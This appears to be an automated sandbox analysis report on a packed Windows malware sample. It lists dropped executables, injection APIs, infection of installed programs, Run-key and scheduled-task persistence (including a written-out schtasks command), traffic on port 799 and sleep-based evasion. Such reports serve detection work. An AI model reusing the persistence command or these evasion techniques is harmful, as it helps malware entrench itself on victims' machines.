Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Lisect_AVT_24003_G1A_89.exe Static file information: File size 3146240 > 1048576
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x22c400
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Unpacked PE file: 0.2.Lisect_AVT_24003_G1A_89.exe.fb0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Unpacked PE file: 1.2.jHYZko.exe.e60000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 7.2.MPGPH131.exe.570000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 8.2.MPGPH131.exe.570000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 15.2.RageMP131.exe.8c0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Unpacked PE file: 16.2.jHYZko.exe.1e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Contains functionality to check for running processes (XOR)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle, 0_2_00FBAB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle, 7_2_0057AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle, 8_2_0057AB50
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 0_2_00FCA100
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: pL~u
PE file contains sections with non-standard names
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name: pL~u
Source: jHYZko.exe.0.dr Static PE information: section name: .aspack
Source: jHYZko.exe.0.dr Static PE information: section name: .adata
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name:
Source: RageMP131.exe.0.dr Static PE information: section name: pL~u
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name:
Source: MPGPH131.exe.0.dr Static PE information: section name: pL~u
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: u
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108D509 push ecx; ret 0_2_0108D51C
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA0EC0 push 7ECA0002h; ret 0_2_7ECA0ECF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1AC0 push 7ECA0002h; ret 0_2_7ECA1ACF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA26C0 push 7ECA0002h; ret 0_2_7ECA26CF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA16D0 push 7ECA0002h; ret 0_2_7ECA16DF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA22D0 push 7ECA0002h; ret 0_2_7ECA22DF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA12E0 push 7ECA0002h; ret 0_2_7ECA12EF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1EE0 push 7ECA0002h; ret 0_2_7ECA1EEF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA2AE0 push 7ECA0002h; ret 0_2_7ECA2AEF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA0EF0 push 7ECA0002h; ret 0_2_7ECA0EFF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1AF0 push 7ECA0002h; ret 0_2_7ECA1AFF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA26F0 push 7ECA0002h; ret 0_2_7ECA26FF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1280 push 7ECA0002h; ret 0_2_7ECA128F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1E80 push 7ECA0002h; ret 0_2_7ECA1E8F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA2A80 push 7ECA0002h; ret 0_2_7ECA2A8F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA0E90 push 7ECA0002h; ret 0_2_7ECA0E9F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1A90 push 7ECA0002h; ret 0_2_7ECA1A9F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA2690 push 7ECA0002h; ret 0_2_7ECA269F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA16A0 push 7ECA0002h; ret 0_2_7ECA16AF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA22A0 push 7ECA0002h; ret 0_2_7ECA22AF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA12B0 push 7ECA0002h; ret 0_2_7ECA12BF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1EB0 push 7ECA0002h; ret 0_2_7ECA1EBF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA2AB0 push 7ECA0002h; ret 0_2_7ECA2ABF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1640 push 7ECA0002h; ret 0_2_7ECA164F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA2240 push 7ECA0002h; ret 0_2_7ECA224F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1250 push 7ECA0002h; ret 0_2_7ECA125F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1E50 push 7ECA0002h; ret 0_2_7ECA1E5F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA2A50 push 7ECA0002h; ret 0_2_7ECA2A5F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA0E60 push 7ECA0002h; ret 0_2_7ECA0E6F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1A60 push 7ECA0002h; ret 0_2_7ECA1A6F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA2660 push 7ECA0002h; ret 0_2_7ECA266F
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name: entropy: 7.999515690267131
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name: entropy: 7.995045563532632
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name: entropy: 7.346914669025697
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name: entropy: 7.987242582491748
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: section name: pL~u entropy: 6.934637589599884
Source: jHYZko.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: RageMP131.exe.0.dr Static PE information: section name: entropy: 7.999515690267131
Source: RageMP131.exe.0.dr Static PE information: section name: entropy: 7.995045563532632
Source: RageMP131.exe.0.dr Static PE information: section name: entropy: 7.346914669025697
Source: RageMP131.exe.0.dr Static PE information: section name: entropy: 7.987242582491748
Source: RageMP131.exe.0.dr Static PE information: section name: pL~u entropy: 6.934637589599884
Source: MPGPH131.exe.0.dr Static PE information: section name: entropy: 7.999515690267131
Source: MPGPH131.exe.0.dr Static PE information: section name: entropy: 7.995045563532632
Source: MPGPH131.exe.0.dr Static PE information: section name: entropy: 7.346914669025697
Source: MPGPH131.exe.0.dr Static PE information: section name: entropy: 7.987242582491748
Source: MPGPH131.exe.0.dr Static PE information: section name: pL~u entropy: 6.934637589599884
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR entropy: 6.93452978692724
Source: SciTE.exe.1.dr Static PE information: section name: u entropy: 6.934615465188442
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ entropy: 6.9345550066903225

Persistence and Installation Behavior
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe File created: C:\Users\user\AppData\Local\Temp\jHYZko.exe Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131 Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 799
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found stalling execution ending in API Sleep call
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Stalling execution: Execution stalls by calling Sleep
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Window / User API: threadDelayed 966 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Window / User API: threadDelayed 3740 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Window / User API: threadDelayed 1341 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Window / User API: threadDelayed 2105 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4125 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4041 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4028 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4134 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 5226 Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window / User API: threadDelayed 2510 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe API coverage: 9.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5804 Thread sleep count: 966 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480 Thread sleep count: 3740 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480 Thread sleep time: -3740000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5340 Thread sleep count: 1341 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5340 Thread sleep time: -1341000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 5804 Thread sleep count: 234 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 4068 Thread sleep count: 251 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480 Thread sleep count: 2105 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe TID: 1480 Thread sleep time: -2105000s >= -30000s Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1408 Thread sleep count: 4125 > 30 Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1408 Thread sleep time: -4125000s >= -30000s Jump to behavior
